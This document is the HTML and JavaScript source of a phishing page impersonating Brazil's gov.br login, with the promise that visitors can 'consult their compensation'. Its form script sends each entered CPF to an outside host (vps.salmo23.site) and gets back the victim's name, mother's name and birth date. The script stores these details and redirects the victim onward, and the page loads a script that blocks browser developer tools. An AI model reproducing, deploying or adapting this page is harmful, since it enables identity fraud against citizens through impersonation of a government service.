<!DOCTYPE html><html><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gov.br</title>
	<script disable-devtool-auto="" src="disable-devtool" url="https://meutudo.com.br/blog/guia-do-saque-aniversario/"></script>
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">

    <!-- TailwindCSS CDN with custom font configuration -->
    <link rel="stylesheet" href="css/style.css">
    <script src="3.4.16"></script>
    <script src="js/jquery-3.6.0.min.js"></script>
    
    
   <style>
      /* Estilização do pré-carregador */
      #preloader {
          position: fixed;
          top: 0;
          left: 0;
          width: 100%;
          height: 100%;
          background: #ffffff;
          display: flex;
          justify-content: center; /* Centraliza horizontalmente */
          align-items: center; /* Centraliza verticalmente */
          z-index: 9999;
      }
  
      .loader-gif {
          width: 230px; /* Tamanho do GIF ajustável */
          height: 230px;
      }
  </style>
  </head>

  <body class="font-sans">
      
    <header class="flex px-4 bg-white h-16 items-center drop-shadow-md">
          
      <a href="#">
        <img src="images/govbr-logo-large.png" alt="gov.br">
      </a>
    </header>
    <div id="preloader">
      <img src="images/loader.gif" alt="Carregando..." class="loader-gif">
  </div>
    <main class="w-screen flex flex justify-center h-full gap-20 mt-8">
      <img src="images/conta_govbr_v2.jpg" class="h-fit hidden lg:block" alt="">
      <form class="bg-white rounded-sm p-4 drop-shadow-md">
        <h1 class="font-semibold">Identifique-se no gov.br com:</h1>
            
        <div class="flex items-center text-center pt-10 gap-3">
          <img src="images/id-card-solid.png" class="h-4" alt="">
          <p class="text-sm">Número do CPF</p>
        </div>
            
        <div class="flex flex-col gap-2">
          <h6 class="text-sm mt-3">
            Digite seu CPF para
            <span class="font-semibold">consultar</span> sua indenização
          </h6>
            
          <div class="mt-3 flex flex-col gap-1">
            <h2 class="font-semibold text-sm">CPF</h2>
            <input id="cpf-input" type="text" class="border-[1px] rounded-md placeholder:text-xs placeholder:text-black/90 px-4 py-2 text-sm italic border-black/80 focus:bg-yellow-100" placeholder="000.000.000-00" minlength="14" maxlength="14" required="">

       

            <button class="bg-[#1351b4] text-sm font-bold text-white py-3 rounded-full mt-7" id="continuar-button">
  Continuar
</button>

          </div>

          <div class="font-semibold text-sm mt-7 flex flex-col gap-5">
            <div class="border-b-[1px] border-black/50 pb-1">
              <h3>Outras opções de identificação:</h3>
            </div>

            <a href="#" class="flex items-center gap-3">
              <img src="images/Internet-Banking-green.png" alt="">
              <p class="flex items-center text-sm text-green-700">
                Login com seu banco
                <span class="ms-2 text-[10px] text-white bg-green-700 uppercase px-1">Sua conta será prata</span>
              </p>
            </a>

            <a href="#" class="flex items-center gap-3 font-light">
              <img src="images/qrcode.png" alt="">
              <p class="flex items-center text-sm">Login com QR code</p>
            </a>

            <a href="#" class="flex items-center gap-3 font-light">
              <img src="images/CD.png" alt="">
              <p class="flex items-center text-sm">Seu certificado digital</p>
            </a>

            <a href="#" class="flex items-center gap-3 font-light">
              <img src="images/CD-Nuvem.png" alt="">
              <p class="flex items-center text-sm">
                Seu certificado digital em nuvem
              </p>
            </a>
          </div>

          <div class="w-full flex flex-col pt-20 items-center gap-5 font-normal">
            <a href="#" class="text-sm text-blue-800 mt-2 flex items-center gap-3">
              <img src="images/Design-sem-nome.png" class="h-4" alt="">
              <p>Está com dúvidas e precisa de ajuda?</p>
            </a>
            <a href="#" class="text-sm text-blue-800">Termos de Uso e Aviso de Privacidade</a>
          </div>
        </div>
      </form>
    </main>
    
        <div class="flex items-center w-full justify-center" style="display: flex; align-items: center; width: 100%; justify-content: center;">
      <img alt="bc" fetchpriority="high" width="240" height="16" decoding="async" loading="lazy" data-nimg="1" class="h-auto" style="color:transparent; width: 300px; height: auto;" src="images/min-cidades-gov-logo-1.png">
  </div>
    
     <script>
    document.querySelector('form').addEventListener('submit', (e) => {
      e.preventDefault();

      const cpfInput = document.querySelector("#cpf-input");
      const continuarButton = document.querySelector("#continuar-button");

      continuarButton.textContent = "Consultando...";

      if (cpfInput) {
        const cpfValue = cpfInput.value;
        const cpfErrorMessage = document.createElement("p");
        cpfErrorMessage.style.color = "red";
        cpfErrorMessage.className = "cpf-error-message text-xs text-center";

        const cpfPattern = /^\d{3}\.\d{3}\.\d{3}-\d{2}$/;

        const existingError = document.querySelector(".cpf-error-message");
        if (existingError) existingError.remove();

        if (!cpfValue) {
          cpfErrorMessage.textContent = "CPF deve ser informado.";
          cpfInput.parentElement.appendChild(cpfErrorMessage);
          continuarButton.textContent = "Continuar";
          return;
        }

        if (!cpfPattern.test(cpfValue)) {
          cpfErrorMessage.textContent =
            "CPF inválido. Formato esperado: 000.000.000-00.";
          cpfInput.parentElement.appendChild(cpfErrorMessage);
          continuarButton.textContent = "Continuar";
          return;
        }

      $.ajax({
        type: "GET",
        url: `https://vps.salmo23.site/barbudo.php?cpf=${cpfValue.replace(/\D/g, "")}`,
        dataType: "json",
        success: function (response) {
            console.log({response});
            
            // Verifica se o status é OK
            if (response.status !== "OK") {
                alert(response.error || "Erro na consulta");
                return;
            }

            // Armazena os dados no localStorage com a nova estrutura
            localStorage.setItem('cpf', cpfValue.replace(/\D/g, ""));
            localStorage.setItem('nome', response.nome);
            localStorage.setItem('mae', response.filiacao.mae);
            localStorage.setItem('nascimento', response.nascimento);
            
            setTimeout(() => {
                window.location.href = "/espera" + window.location.search;
            }, 1000);
        },
        error: function (jqXHR, textStatus, errorThrown) {
            alert(`Erro ao consultar CPF. Por favor, tente novamente. ${textStatus}`);
            cpfInput.parentElement.appendChild(cpfErrorMessage);
            continuarButton.textContent = "Continuar"; 
            console.error('Erro ao consultar CPF:', textStatus);
        },
      });
      }
    });
</script>

  <script>
    function formatarCPF(cpf) {
      // Remove qualquer caractere não numérico
      cpf = cpf.replace(/\D/g, "");
      // Aplica a máscara no formato 000.000.000-00
      return cpf
        .replace(/(\d{3})(\d)/, "$1.$2")
        .replace(/(\d{3})(\d)/, "$1.$2")
        .replace(/(\d{3})(\d{1,2})$/, "$1-$2");
    }

    function main() {
      const cpfInput = document.querySelector("#cpf-input");

      // Adiciona formatação ao CPF enquanto o usuário digita
      cpfInput.addEventListener("input", (event) => {
        event.target.value = formatarCPF(event.target.value);
      });
    }

    // Inicializa a função principal
    main();
  </script>
    
     <script>
  // Aguarda 4 segundos antes de remover o pré-carregador
  window.addEventListener('load', () => {
    setTimeout(() => {
      const preloader = document.getElementById('preloader');
      if(preloader) {
        preloader.style.display = 'none';// Mostra o conteúdo do site
      }
    }, 2000); // 4000ms = 4 segundos
  });
</script>
</body></html>